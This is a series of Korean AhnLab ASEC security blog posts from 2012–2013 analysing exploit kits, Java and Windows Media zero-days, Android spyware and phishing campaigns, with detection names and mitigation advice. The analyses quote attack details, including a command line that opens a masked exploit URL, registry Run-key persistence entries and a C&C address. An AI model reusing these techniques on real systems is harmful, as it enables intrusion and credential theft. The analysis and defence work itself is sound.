안랩 ASEC에서 2013년 9월 국내,외에서 발생한 다양한 보안 위협 이슈와 동향들을 정리한 ASEC 리포트 2013 Vol.45을 발간하였다. 


이 번에 발간된 ASEC 리포트는 2013년 9월 주요 보안 위협 이슈들을 다음과 같이 분석하고 있다.


1) 악성코드 이슈

ZeroAccess 악성코드의 지속적인 등장

구글 업데이트를 위장한 ZeroAccess 악성코드

IE 실행 시 중국 사이트 접속?!

대형 인터넷 쇼핑몰을 겨냥한 금융 피싱 악성코드 기승

난독화된 스크립트 악성코드 감염 주의

최신 음악 토렌트 파일을 위장한 PUP 유포

홍콩금융관리국 위장 악성 스팸 메일

페이징 파일에 잔존하는 데이터


2) 모바일 악성코드 이슈

한국인터넷진흥원을 사칭한 스미싱 주의!

금융사 피싱 앱 변종 발견

금융 예방 서비스?


3) 보안 이슈

제로데이 IE 취약점, CVE-2013-3893 

어도비사 고객정보 및 소스코드 유출 사건


ASEC에서 발간하는 월간 보안 위협 동향 리포트는 아래 웹 사이트에서 확인 할 수 있다. 


ASEC 보안 위협 동향 리포트 2013 Vol.45 발간

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

미국 현지 시각으로 8월 26일 보안 업체 FireEye에서 블로그 "ZERO-DAY SEASON IS NOT OVER YET"를 통해 오라클(Orcle) 자바 JRE(Java Runtime Environment) 7에서 임의의 코드를 실행 할 수 있는 코드 실행 취약점(CVE-2012-4681)을 발견하였음을 공개하였다.


현재 해당 자바 JRE 취약점은 개발 업체인 오라클에서 해당 보안 취약점을 제거할 수 있는 보안 패치를 제공하지 않고 있는 제로 데이(Zero-Day, 0-Day) 취약점으로 각별한 주의가 필요하다.


이 번에 발견된 자바 JRE 관련 제로 데이 취약점은 다음 버전의 소프트웨어에서 악용이 가능하다.


Oracle Java 7 (1.7, 1.7.0)

Java Platform Standard Edition 7 (Java SE 7)

Java SE Development Kit (JDK 7)

Java SE Runtime Environment (JRE 7)


해당 자바 JRE 관련 취약점은 최초 아래 이미지와 같이 중국에서 제작된 공다 팩(GongDa Pack)이라 불리는 웹 익스플로잇 툴킷(Web Exploit Toolkit)에서 사용되는 스크립트 악성코드를 통해 유포되었으며, 최초 유포지는 대만에 위치한 특정 시스템이다.



이 번 자바 JRE 취약점 악용을 위해 유포된 공다 팩에서 사용되는 스크립트를 디코딩 하게 되면 스크립트가 유포된 동일한 시스템에 존재하는 Appelt.jar (7,855 바이트)와 hi.exe (16,896 바이트)가 다운로드 되도록 제작되었다.


다운로드 된 Appelt.jar (7,855 바이트) 내부에는 아래 이미지와 같이 해당 CVE-2012-4681 취약점을 직접적으로 악용하도록 제작되어 있는 클래스(Class) 파일인 App.class (7,231 바이트)가 포함되어 있다.



해당 자바 JRE 취약점(CVE-2012-4681)으로 인해 실행되는 hi.exe (16,896 바이트)는 최초 실행이 되면 윈도우 시스템 폴더(C:\WINDOWS\system32\)에 mspmsnsv.dll (10,240 바이트) 파일을 생성하게 된다.


C:\WINDOWS\system32\mspmsnsv.dll 


그리고 윈도우 시스템에 존재하는 정상 프로세스인 svchost.exe를 실행하여 해당 프로세스의 스레드로 생성한 mspmsnsv.dll (10,240 바이트)을 인젝션하게 된다.


인젝션이 성공하게 되면 특정 도메인명을 가진 C&C 서버와 통신을 시도하나 분석 당시에는 정상적인 접속이 이루어지지 않았다. 정상적으로 접속이 성공하게 되면 원격 제어 등의 공격자가 의도하는 백도어 기능을 수행하게 된다.


추가적으로 핀란드 보안 업체 F-Secure에서는 블로그 "Blackhole: Faster than the speed of patch"를 통해 블랙홀 웹 익스플로잇 툴 킷(Blackhole Web Exploit Toolkit)을 통해서도 유포 중에 있는 것으로 공개하였다.


ASEC에서 이와 관련한 추가 정보들을 확인하는 과정에서 사회 공학 기법을 악용한 이메일을 통해 최소 약 300개의 도메인을 이용해  유포 중인 것으로 파악하였다.


현재 블랙홀 웹 익스플로잇 툴 킷을 통해 유포 중인 CVE-2012-4681 취약점을 악용하는 JAR 파일은 Pre.jar (31,044 바이트)Leh.jar (31,044 바이트) 파일명으로 유포 중이나 2개 모두 동일한 파일이다. 그러나 현재 언더그라운드에서는 해당 취약점을 악용 가능한 PoC(Proof of Concept)가 공개되어 있음으로 다양한 변형들이 지속적으로 유포될 것으로 예측된다.


이 번에 발견된 자바 JRE 7에서 임의의 코드를 실행 할 수 있는 코드 실행 취약점(CVE-2012-4681)을 악용하는 악성코드들 모두 V3 제품 군에서 다음과 같이 진단한다.


JS/Downloader

JAVA/CVE-2012-4681

JS/Blacole

Win-Trojan/Poison.16898 

Win-Trojan/Buzus.153447

Trojan/Win32.Npkon


그리고 네트워크 보안 장비인 트러스가드(TrusGuard) 제품군에서는 해당 취약점을 악용한 공다 팩 스크립트 악성코드와 취약한 클래스 파일을 포함한 JAR 파일을 다음과 같이 탐지 및 차단이 가능하다.


javascript_malicious_gongda-2(HTTP)

java_malicious_jar-8(HTTP)

java_malicious_jar-gd(HTTP)


앞서 언급한 바와 같이 현재 자바 JRE에서 발견된 취약점은 제로데이 취약점으로 자바 개발 업체인 오라클에서 보안 패치를 제공하지 않고 있다.


이와 관련하여 US-CERT에서는 보안 권고문 "Oracle Java JRE 1.7 Expression.execute() and SunToolkit.getField() fail to restrict access to privileged code" 을 통해 아래와 같은 사항들을 임시 방안으로 권고하고 있다.


* 자바 플러그인 비활성화


- 파이어폭스 (Firefox)

파이어폭스 실행 후 상단의 [도구]->[부가 기능]을 클릭한다. 그 중에서 "플러그인"을 선택 후 자바 관련 플러그인들을 "사용안함"으로 설정한다.


- 사파리(Safari)

[기본 설정]을 클릭후 [보안]을 선택한다. 그리고 "Java 활성화"에 체크 마크를 해제한다.



- 크롬(Chrome)

크롬을 실행 후 주소 창에 "chrome://plugins/"을 입력한 후, "JAVA Plug-in"을 사용 중지한다.


- 인터넷 익스플로러(Internet Explorer)

윈도우 제어판을 실행 훈 "Java 제어판" -> [고급]을 선택 한 후 [브라우저용 기본 Java]에서 [Microsoft Internet Explorer]에 체크 마크를 해제한다.



앞서 언급한 바와 같이 현재 해당 취약점은 보안 패치가 제공되지 않는 제로 데이 취약점임으로 각별한 주의가 필요하다. 그리고 언더그라운드에는 이미 해당 취약점을 악용 할 수 있는 PoC 코드가 공개 되었음으로 다양한 보안 위협에서 해당 취약점을 악용 할 가능성이 높을 것으로 예측 된다.

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

ASEC에서는 중국에서 제작되는 것으로 추정되는 GongDa Pack으로 명명된 스크립트 형태의 악성코드가 지속적으로 발견되고 있다는 것을 공개한 바가 있다.


7월 30일 - GongDa Pack의 스크립트 악성코드 증가


최근들어 GongDa Pack으로 명명된 스크립트 악성코드 이외에 YSZZ로 명명된 스크립트 악성코드가 버전을 계속 변경하면서 유포되고 있는 것이 발견되었다.


7월 3일 발견된 스크립트 악성코드의 경우는 아래 이미지처럼 상반기부터 발견되기 시작한 다른 YSZZ 스크립트 악성코드 변형들과 동일하게  0.3 버전의 스크립트 였다. 



그러나 8월 3일 발견된  YSZZ 스크립트 악성코드는 아래 이미지와 같이 0.8 VIP 버전으로 업데이트된 버전의 스크립트 였다.



8월 11일 주말에 발견된 YSZZ 스크립트 악성코드는 아래 이미지와 같이 0.9 VIP 버전으로 다시 업데이트된 버전의 스크립트 였다.



해당 업데이트 된 버전의  YSZZ 스크립트 악성코드들은 V3 제품군에서 다음과 같이 진단한다. 하지만 다수의 변형들이 지속적으로 발견되고 있음으로 주의가 필요하다.


HTML/Downloader

JS/Downloader 

JS/Agent 


그리고 네트워크 보안 장비인 트러스가드(TrusGuard) 제품군에서는 다음과 같이 탐지 및 차단이 가능하다.


javascript_malicious_yszz(HTTP)

javascript_malicious_yszz-2(HTTP)


공다 팩과 YSZZ 스크립트 악성코드 모두 어도비 플래쉬(Adobe Flash)와 자바(JAVA)와 같은 일반 어플리케이션들의 취약점을 악용하여 다른 온라인 게임 관련 악성코드나 원격 제어가 가능한 백도어 형태의 악성코드들의 감염을 시도하는 특징이 있다.


그러므로, 운영 체제를 포함한 자주 사용하는 어플리케이션들의 취약점을 제거할 수 있는 보안 패치들을 주기적으로 설치하는 것이 중요하다.

저작자 표시 비영리 변경 금지
신고
Posted by 비회원

해외 보안 업체인 트렌드 마이크로(Trend Micro)에서는 7월 27일 "Adding Android and Mac OS X Malware to the APT Toolbox" 제목의 문서를 공개하였다.


해당 문서는 2012년 3월 해당 업체에서 공개한 "Luckycat Redux: Inside an APT Campaign" 럭키캣(Luckycat)이라고 명명된 APT 공격 형태를 조사하는 과정에서 발견된 안드로이드(Android) 악성코드에 대해 다루고 있다.


해당 업체에서는 럭키캣 APT 공격과 관련된 특정 C&C 서버를 조사하는 과정에서 해당 C&C 서버에서 AQS.apk (15,675 바이트)와 testService.apk (17,810 바이트) 2개의 안드로이드 스마트폰에 설치 가능한 APK 파일 2개를 발견하게 되었다고 한다.


ASEC에서는 해당 2개의 AQS.apk (15,675 바이트)와 testService.apk (17,810 바이트) 파일들을 확보하여 자세한 분석을 진행하였다.


2개의 APK 파일들은 모두 동일한 기능을 하도록 제작되었으며, 그 중 testService.apk (17,810 바이트)을 안드로이드 스마트폰에 설치하게 되면 아래 이미지와 동일한 아이콘을 생성하게 된다.



그리고 해당 앱을 사용자가 직접 실행시키거나  스마트폰이 사용자에 의해 부팅하게 될 경우 이를 자동으로 감지하여 TService 라는 서비스로 실행하게 된다.



해당 서비스는 감염된 안드로이드 스마트폰에서 IMEI(International Mobile Equipment Identity), 스마트폰 번호와 저장 장치의 파일 정보들을 수집하여 중국에 위치한 gr******ns.3322.org:54321 해당 C&C 서버와 통신을 시도하게 된다.



해당 C&C 서버와 통신이 성공하게 되면 아래 이미지와 같이 공격자가 지정한 다양한 악의적인 명령들을 수행할 수 있게 된다.



공격자는 파일 업로드 및 다운로드, 인터넷 연결 접속 그리고 원격 명령을 수행하는 리모트 쉘(Remote Shell) 명령을 C&C 서버를 통해 내릴 수 있다.


이번 럭키캣 APT 공격과 관련된 특정 C&C 서버에서 발견된 안드로이드 악성코드들 모두 V3 모바일 제품군에서 다음과 같이 진단한다.


Android-Trojan/Infostealer.G

Android-Trojan/Infostealer.H


해당 2개의 안드로이드 악성코드가 실제 럭키캣 APT 공격에 사용되었는지는 명확하지 않다.  그러나 APT 공격과 관련된 C&C 서버에서 발견되었다는 사실로 미루어 볼 때, APT 공격을 수행한 공격자들은 안드로이드 악성코드 제작과 유포를 통해 특정 조직의 중요 정보 탈취에 악용하고자 하였던 것으로 추정된다.

저작자 표시
신고
Posted by 비회원

ASEC에서는 6월 5일 웹 익스플로잇 툴킷(Web Exploit Toolkit)의 일종인 블랙홀(Blackhole) 웹 익스플로잇 툴 킷이 스팸 메일(Spam Mail)과 결합되어 유포되었다는 사실을 밝힌 바가 있다.


금일 블랙홀 웹 익스플로잇 툴 킷과 결합된 스팸 메일이 다시 발견되었으며, 이 번에 발견된 스팸 메일은 사용자가 많은 유명 소셜 네트워크(Social Network) 서비스인 링크드인(LinkedIn)의 초대 메일로 위장하여 유포되었다.


이 번에 발견된 링크드인 스팸 메일과 결합된 형태로 유포된 블랙홀 웹 익스플로잇 툴킷은 아래 이미지와 같이 다양한 취약점들을 악용하고 있으며 최종적으로 감염된 PC에서 사용자 정보들을 탈취하기 위한 악성코드 감염을 목적으로 하고 있다.



링크드인의 초대 메일로 위장해 유포된 스팸 메일은 아래 이미지와 같은 형태를 가지고 있으며, [Accept] 부분은 정상적인 링크드인 웹 페이지로 연결되는 것이 아니라 중국에 위치한 특정 시스템으로 연결되도록 구성되어 있다.



해당 [Accept] 부분을 클릭하게 되면 중국에 위치한 특정 시스템으로 접속하며, PC 사용자에게는 아래와 같은 이미지를 보여주게 된다.



그러나 실제 해당 웹 페이지 하단에는 아래 이미지와 같이 웹 페이지 하단에는 다른 러시아에 위치한 시스템으로 연결되는 자바 스크립트 코드가 인코딩 되어 있다.



해당 자바 스크립트 코드를 디코딩하게 되면 아래 이미지와 같이 iFrame 으로 처리된 코드가 나타나며, 사용자 모르게 러시아에 위치한 블랙홀 웹 익스플로잇 툴킷이 설치되어 있는 시스템으로 연결하게 된다.



해당 블랙홀 웹 익스플로잇 툴킷에 성공적으로 연결하게 되면 웹 브라우저에 의해 CMD 명령으로 윈도우 미디어 플레이(Windows Media Player) 취약점을 악용하기 위한 시도를 하게 된다. 그러나 분석 당시 해당 취약점은 정상적으로 악용되지 않았다.


"C:\Program Files\Windows Media Player\wmplayer.exe" /open http://************.ru:8080/forum/data/hcp_asx.php?f=182b5"


그리고 두 번째로 자바(JAVA)와 인터넷 익스플로러(Internet Explorer)에 존재하는 알려진 취약점을 악용하기 위한 스크립트 파일이 실행된다.



세 번째로 어도비 아크로뱃 리더(Adobe Acrobat Reader)에 존재하는 알려진 취약점을 악용하기 위한 PDF 파일을 아래 이미지와 같이 다운로드 후 실행 하게 된다.



해당 링크드인 스팸 메일을 수신한 PC에 위에서 언급한 4개의 취약점 중 하나라도 존재 할 경우에는 동일한 시스템에서 wpbt0.dll (127,648 바이트)를 다운로드하여 다음 경로에 생성하게 된다.


C:\Documents and Settings\Tester\Local Settings\Temp\wpbt0.dll


그리고 생성된 wpbt0.dll (127,648 바이트) 는 다시 자신의 복사본을 아래 경로에 KB01458289.exe (127,648 바이트)라를 명칭으로 복사하게 된다.


C:\Documents and Settings\Tester\Application Data\KB01458289.exe


감염된 PC의 레지스트리에 다음 키 값을 생성하여 PC가 재부팅 할 때마다 자동 실행 되도록 구성하였다.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\

KB01458289.exe = C:\Documents and Settings\Tester\Application Data\KB01458289.exe


그리고 감염된 PC에서 실행 중인 모든 정상 프로세스의 스레드로 자신의 코드 일부분을 삽입한 후 다음의 정보들을 후킹하게 된다.


웹 사이트 접속 정보

FTP 시스템 접속 사용자 계정과 비밀 번호 정보

POP3 이용 프로그램 사용자 계정과 비밀 번호 정보

웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects)으로 웹 사이트 사용자 계정과 암호 정보


감염된 PC에서 수집된 정보들 모두는 아래 이미지와 같이 악성코드 내부에 하드코딩 되어 있는 특정 시스템들으로 후킹한 데이터들 전부를 인코딩하여 전송하게 된다.



그리고 마지막으로 감염된 PC 사용자에게는 아래 웹 페이지와 같이 연결을 시도한 웹 페이지를 보여주어 정상적인 접속이 실패한 것으로 위장하게 된다.



이 번에 발견된 링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포한 악성코드들은 V3 제품군에서 모두 다음과 같이 진단한다.


JS/Iframe

Packed/Win32.Krap

PDF/Exploit
JS/Exploit

링크드인 스팸 메일과 결합된 블랙홀 웹 익스플로잇 툴킷에서 유포를 시도한 악성코드는 기존에 발견된 온라인 뱅킹 정보 탈취를 목적으로하는 제우스(Zeus) 또는 스파이아이(SpyEye)와 유사한 웹 폼 변조(Formgrabber) 및 웹 폼 인젝션 (httpinjects) 기능으로 웹 사이트 사용자 계정과 암호 정보를 탈취 할 수 있다.


이는 악성코드 유포자가 의도하는 대부분의 웹 사이트들에서 사용자 계정과 비밀 번호 정보를 탈취 할 수 있음으로, 단순 스팸 메일로 판단되더라도 송신자가 불명확한 메일에 포함된 웹 사이트 연결 링크를 클릭하지 않는 주의가 필요하다.

저작자 표시
신고
Posted by 비회원
2012년 1월 27일 금일 트렌드 마이크로(Trend Micro) 블로그 "Malware Leveraging MIDI Remote Code Execution Vulnerability Found"를 통해 마이크로소프트(Microsoft)에서 1월 11일 배포하였던 보안 패치인 "MS12-004  Windows Media의 취약점으로 인한 원격 코드 실행 문제점 (2636391)"와 관련된 취약점(CVE-2012-0003)을 악용하여 유포된 악성코드가 발견되었다.

해당 MS12-004 취약점을 악용하여 유포된 악성코드와 관련된 사항들을 ASEC에서 추가적인 조사를 진행하는 과정에서 해당 악성코드는 아래와 같은 전체적이 구조를 가지고 있는 것으로 파악하였다.


악성코드 감염의 근본적인 시작이 되는 mp.html(16,453 바이트) 파일은 최초 1월 21일 설날 연휴가 시작되는 토요일 국내에서 발견되었으며, 해당 스크립트 악성코드가 존재하였던 시스템은 미국에 위치하고 있다.

그리고 해당 악성코드들과 관련된 공격자는 한국과 중국을 포함한 극동 아시아 권을 주된 대상으로 해당 악성코드들을 유포 한 것으로 ASEC에서는 추정하고 있다. 


해당 mp.html 스크립트 악성코드를 텍스트 에디터로 분석을 해보면 아래와 같은 구조를 가지고 있으며, 파일 중간에는 실질적인 MS12-004 취약점을 악용하는 MIDI 파일인 baby.mid(38,068 바이트) 파일과 다른 자바 스크립트(JavaScript)인 i.js와 쉘코드(Shallcode)가 포함되어 있다.


아래 이미지와 동일한 MIDI 파일인 baby.mid는 MS12-004 취약점을 악용하도록 되어 있으며, 해당 취약점을 통해 ASLR/DEP를 모두 우회하여 공격자가 지정한 특정 코드를 실행 할 수 있도록 되어 있다. 

일반적인 MIDI 파일 포맷은 Header Chunk 와 Track Chunks로 구성되어 있다. 그러나 이번에 발견된 악의적으로 조작된 MIDI 파일에서 Note On/OFF (소리내기/끄기) 명령어인 해당 Track Event 중 첫번째 파라미터인 "Note Number" 값은 최대 127까지 표현가능하다.  

그러므로, 아래 이미지와 같이 B2(>128) 값으로 설정된 경우에는 오프셋(Offset) 계산 시 경계 범위를 넘게되어 잘못된 메모리 번지를 참조하게 되는 오류가 발생하게 된다.


mp.html 스크립트 악성코드에 포함되어 있는 쉘코드는 미국에 위치한 특정 시스템에서 인코딩(Encoding) 되어 있는 파일인 tdc.exe(73,728 바이트) 를 다운로드 한 후에 다시 이를 디코딩(Decoding) 과정을 거쳐 정상적인 PE 파일 형태를 가지게 된다.


정상적인 PE 파일 형태를 가지게 된 tdc.exe 파일이 실행되면 다음의 파일들을 생성하게 된다.

C:\WINDOWS\system32\drivers\com32.sys (11,648 바이트)
C:\WINDOWS\system32\com32.dll (57,344 바이트)


레지스트리(Registry)에 다음의 키 값을 생성하여 윈도우(Windows)가 재시작 시에 해당 드라이버 파일이 "Com32"라는 서비스명으로 자동 구동 되도록 설정하게 된다.

HKLM\SYSTEM\ControlSet001\Services\Com32\ImagePath  
"System32\drivers\com32.sys"


생성된 드라이버 파일인 com32.sys tdc.exe가 생성한 com32.syscom32.dll 파일들을 보호하기 위해 다른 프로세스의 접근을 방해한다. 그러나 다음의 프로세스들의 접근에 대해서는 허용하고 있다.

IEXPLORER.EXE
exploere.exe
rundll32.exe 


그리고 com32.sys는 \FileSystem\FastFat 과 \FileSystem\Ntfs의 DriverObject의 IRP_MJ_CREATE 핸들러 주소를 후킹한 코드 주소로 변경하는 방법을 사용하고 있다.

생성된 com32.dll는 감염된 시스템에서 국내에서 제작되어 사용중인 보안 제품들이 실행 중이라면 해당 프로세스들의 강제 종료를 시도하게 된다.


추가적으로 아래 이미지와 같이 특정 시스템으로 접속을 시도하여 성공하게 될 경우에는 아래 이미지와 같이 20120120.exe(89,088 바이트)를 다운로드 하게 된다.


다운로드 된 20120120.exe는 감염된 시스템에 존재하는 정상 윈도우 시스템 파일인 imm32.dll 파일을 랜덤한 파일명으로 백업을하고 국내에서 제작된 온라인 게임들의 사용자 계정과 암호를 외부로 탈취하는 기능들을 수행하게 된다.

현재까지의 상황들을 종합해보면 이번 MS12-004 취약점을 악용하여 악성코드 감염을 시도하는 제작자는 최종적으로 윈도우 보안 패치가 설치되지 않은 시스템에서 온라인 게임 사용자 정보들을 탈취하기 위한 악성코드 감염을 시도한 사례라고 볼 수 있다.

발견된 악성코드의 제작 기법과 국내 보안 프로그램의 강제 종료 기법들을 볼 때 중국에서 제작된 온라인 게임 관련 악성코드와 유사도가 높다고 할 수 있다.

그러므로 해당 MS12-004 취약점은 다른 악성코드 변형들에서도 다른 형태의 유포 기법으로 악용될 소지가 높음으로 사용하는 윈도우 시스템에 최신 보안 패치들을 모두 설치하는 것이 최선의 예방책이다.

이번 MS12-004 취약점과 관련된 악성코드들 모두 V3 제품군에서는 다음과 같이 진단한다.

JS/Cve-2009-0075 
JS/Agent 
Exploit/Ms12-004 
Win-Trojan/Rootkit.7808.H 
Dropper/Win32.OnlineGameHack 
Win-Trojan/Meredrop.73728.C
Win-Trojan/Rootkit.11648.B
Win-Trojan/Waltrodock.57344
Win-Trojan/Meredrop

그리고 TrusGuard 네트워크 보안 장비에서도 해당 취약점에 대해 다음의 명칭으로 탐지 및 차단이 가능하다. 

malicious_url_20120127_1459(HTTP)-1
ms_ie_mid_file_exploit-t(CVE-2012-0003/HTTP)

저작자 표시
신고
Posted by 비회원
2012년 1월 26일 해외를 중심으로 유명 소셜 네트워크 서비스(Social Network Service)인 트위터(Twitter)의 메시지를 통해 트위터 사용자 계정과 암호를 수집하기 위한 용도의 피싱(Phishing) 시도가 발견되었다.

이 번에 발견된 트위터에서 피싱 시도는 처음으로 있는 일이 아니며 2010년 2월 24일 트위터의 다이렉트 메시지(Direct Message)의 단축 URL(URL Shortening)을 이용해 피싱 웹 사이트로 접속을 유도한 사례가 있다.

금일 발견된 트위터에서의 피싱 웹 사이트로 접속을 유도하는 방식은 기존과 동일하게 단축 URL을 이용하여 사용자가 호기심을 가질만한 내용으로 위장하고 있다.

 
해당 트위터 메시지에 포함된 단축 URL을 클릭하게 되면 아래 이미지와 같이 트위터 사용자 로그인 페이지와 유사한 웹 사이트로 연결된다.

 
그러나 실제 해당 웹 사이트는 트위터 사용자 로그인 페이지로 위장하여 트위터 사용자 계정와 로그인 암호를 수집하기 위해 정교하게 제작된 피싱 웹 페이지이다.

그리고 입력되는 사용자 계정과 로그인 암호들 모두는 중국에 위치한 특정 시스템으로 전송하게 되어 있어 수집한 사용자 계정과 로그인 암호를 이용하여 다른 보안 위협 유포에 악용할 것으로 추정된다.

이러한 단축 URL을 이용하여 보안 위협을 유포한 사례들로는 2011년 1월 21일 단축 URL을 이용해 허위 백신 감염을 시도한 사례, 2011년 5월 15일 단축 URL을 이용해 맥(Mac) OS에 감염되는 허위 백신 유포 사례2011년 8월 9일 단축 URL을 이용해 신용카드 결제를 유도하는 스팸 메시지 유포 사례 등 다수가 존재함으로 단축 URL 클릭시에는 각별한 주의가 필요하다.

그러므로 트위터를 통해 잘 모르는 사람을 통해 전달 받은 메시지에 포함된 단축 URL 클릭시에는 주의를 기울여야 한다.
저작자 표시
신고
Posted by 비회원

- 앱, OS 취약점 노린 악성코드 대량 유포, 좀비폰 본격 등장 예상 
- 스마트폰 전용 백신, 공식 마켓 활용 등 사용자 주의 당부

글로벌 보안 기업인 안철수연구소[대표 김홍선, www.ahnlab.com, 약칭 ‘안랩’]는 5일 2011년에 발생했던 주요 스마트폰 악성코드 트렌드와 2012년에 예상되는 스마트폰 보안 위협을 발표했다.
 
이에 따르면 2011년의 주요 이슈는 ▶과금형 악성코드 폭발적 증가 ▶유명 어플리케이션으로 위장한 악성코드 ▶사생활 침해형 애플리케이션 증가 ▶ 온라인뱅킹정보 노리는 악성코드 발생 등을 꼽았다.
 
또한, 2012년 한 해 예상되는 주요 스마트폰 보안이슈는 ▶ 애플리케이션, OS 취약점 등을 이용한 악성코드 대량 유포 가능성 ▶커널을 공격하는 루트킷 기능의 발전 ▶ 좀비폰 및 봇넷 본격적 활성화 ▶국내를 겨냥하는 모바일 악성코드 등장 등이다.
 
2012년 예상 스마트폰 보안 위협
 
1] 애플리케이션, 운영체제 취약점 등을 이용한 악성코드 대량 유포 가능성
 
현재 윈도우 PC 기반 악성코드 배포 방식 중 가장 유행하는 것은, 웹사이트 변조를 통해 악성코드를 심어 관련 취약점이 패치 되지않은 다수의 사용자에게 악성코드를 유포하는 것이다. 이와 동일하게 스마트폰 사용자가 증가하고, 자연스럽게 이를 통해 인터넷 웹페이지를 보는 경우가 증가함에 따라 해커의 타깃이 될 가능성이 높다. 모바일 환경에서도 PC와 마찬가지로 모바일용 웹어플리케이션의 취약점을 이용해 다수의 사용자에게 한꺼번에 악성코드를 유포한다면 매우 위험해질 수 있다. 소셜네트워크서비스[SNS], 이메일 애플리케이션 등도 취약점이 발견된다면 역시 악용될 수 있다.
 
2] 스마트폰 커널을 공격하는 루트킷 기능의 발전
 
안드로이드의 루팅[rooting]이나, 아이폰의 해킹[hacking]은 애플리케이션의 취약점을 이용하는 것이다. 운영체계의 가장 중요한 핵심인 ‘커널’의 모든 것을 조작할 수 있는 일명 슈퍼유저[super user]의 권한을 취득하게 해준다. 수퍼유저 권한 획득은 일반적 사용자에게 스마트폰의 기능 중 다양한 이유로 제한된 부분을 임의로 조작할 수 있게 해준다. 반면, 악의적인 사용자나 어플리케이션이 이 방법을 악용한다면 치명적일 수 있다. 예를 들어, 시스템 자체를 삭제해서 스마트폰을 영원히 쓸 수 없게 만든다거나, 절대 삭제할 수 없는 악성 애플리케이션을 몰래 실행시킨다거나 하는 것이다. 모바일 악성코드가 증가할수록 이와 같은 스마트폰의 커널을 공격하는 발전된 기술이 유포될 가능성이 높다.
 
3] 좀비 스마트폰 본격적 활성화
 
스마트폰에 악성코드를 대량으로 유포하는 방식이 발전한다면, 좀비PC와 마찬가지로 ‘좀비스마트폰’이 활성화할 가능성이 높다. 7.7 이나 3.4 디도스 공격과 같은 사태가 스마트폰 감염으로 발생하지 않으리라는 보장은 없는 것이다. 올해 안드로이드 플랫폼에서도 스마트폰을 좀비화시키는 봇[bot]에 감염된 ‘좀비 스마트폰’의 네트워크인 ‘봇넷[botnet]을 구성하려는 시도를 보인 악성코드가 중국의 써드파티 마켓에서 발견되었지만, 제한적인 마켓에서만 유포됐기 때문에 피해는 크지 않았다. [http://asec.ahnlab.com/299 참고]
 
4] 국내를 겨냥하는 스마트폰 악성코드 등장
 
2011년에는 다양한 스마트폰 악성코드가 발생한 한 해였지만, 대부분의 악성코드가 유럽, 러시아, 중국 지역을 겨냥하여 만들어져 국내에서의 모바일 악성코드 피해는 크지 않았다. 그러나 한국의 스마트폰 사용률이 매우 높은 편이라는 것을 고려할 때, 악성코드 제작자의 주목을 받을 소지가 다분하다. 국내의 스파이웨어 방지법을 교묘히 피해 제작되는 애드웨어성 악성코드나, 각종 온라인게임계정 또는 민감한 개인정보를 탈취하는 류의 악성코드가 국내의 모바일 환경에 맞게 새롭게 등장할 수 있다.
 
2011년 주요 스마트폰 악성코드 트렌드

1] 과금형 악성코드 폭발적 증가

2011년을 대표하는 안드로이드 악성코드로는 과금형 악성코드를 꼽을 수 있다. 과금형 악성코드는 안드로이드 플랫폼이 전화나 문자기능이 포함된 스마트폰 운영체제[OS]라는 점을 악용한 예이다. 대부분 문자 과금 방식[premium call, 송신자에게 추가요금이 발생하는 번호 서비스]을 주로 이용한다. 즉, 악성코드 감염 시 추가 과금을 발생시키는 특정 번호로 사용자 몰래 문자를 보내 피해자에겐 금전적 피해를 주는 동시에 공격자에겐 직접 수익을 발생시킨다. 가장 최근에 발견된 과금 악성코드는 Android-Trojan/Pavelsms [http://asec.ahnlab.com/751 참고]로, 해외에선 ‘ruFraud’라는 이름으로 알려져 있다. 이 악성코드는 감염 시 스마트폰의 가입국가를 파악하고 유럽 내 스마트폰일 경우 각 국가에 맞는 프리미엄 문자를 보내는 것이 특징이다.
 
2] 유명 어플리케이션으로 가장한 위장형 악성코드
 
구글서치[Google Search], 구글플러스[Google+], 앵그리버드[Angry bird], 오페라[Opera], 스카이프[Skype] 등 사용자층이 많은 유명 어플리케이션으로 위장해 악성코드를 배포한 사례도 있다. 이런 위장형 악성코드는 주로 정식마켓이 아닌 사설마켓[써드파티마켓]을 통해 배포되었다. 또한 실제 정상 애플리케이션과 아이콘, 애플리케이션 이름이 완전히 동일하여 사용자가 쉽게 구분하기 어렵다. 다른 위장형 악성코드로는 정상 어플리케이션과 완전히 동일하게 동작하게끔 하면서 추가적으로 악성코드를 삽입하여 재배포 시키는 리패키징[repackaging]형 악성코드가 있다. [http://asec.ahnlab.com/258 참고]
 
3] 사생활 침해 형 어플리케이션 증가
 
스마트폰은 통화 및 문자 송수신, 카메라, GPS 기능 등으로 인해 PC보다 좀더 생활에 밀착된 민감한 정보들을 가지고 있다. 이러한 정보들이 유출될 시에는 심각한 사생활 침해가 된다. 예를 들어 진단명 ‘Android-Spyware/Nicky’와 같은 악성코드는 GPS를 통해 수집된 사용자 위치정보, 문자 송수신, 전화 송수신 내역뿐만 아니라 음성녹음 기능을 악용해 사용자의 통화내용까지도 훔쳐가는 기능을 내장하고 있어서 큰 충격을 주었다. [http://asec.ahnlab.com/320, http://core.ahnlab.com/290 참고] 2011년뿐 아니라 앞으로도 이러한 디지털 스토커[digital stalker]형 악성코드가 지속적으로 증가할 전망이다.
 
4] 온라인뱅킹정보 노리는 악성코드 발생
 
온라인뱅킹 정보를 갈취하는 것으로 유명한 Zeus 악성코드가 다양한 모바일 환경에서도 동작하도록 제작되어 유포된 것이 발견되었다. Zitmo[Zeus In The Mobile] 로 불리는 이 악성코드는 심비안, 블랙베리를 거쳐 최근엔 안드로이드 플랫폼까지 진화했다. 안드로이드의 Zitmo 악성코드는 해외의 뱅킹 보안 업체의 제품을 위장해 실행되었다. 온라인 뱅킹에 접속할 때 일회용 비밀번호[OPT]와 문자인증 등 두 가지의 인증요소로 본인임을 확인하는 이중인증[two-factor] 방식을 깨기 위해 문자 수신내역까지 감청하는 등의 치밀함을 보여준 것이 특징이다.
 
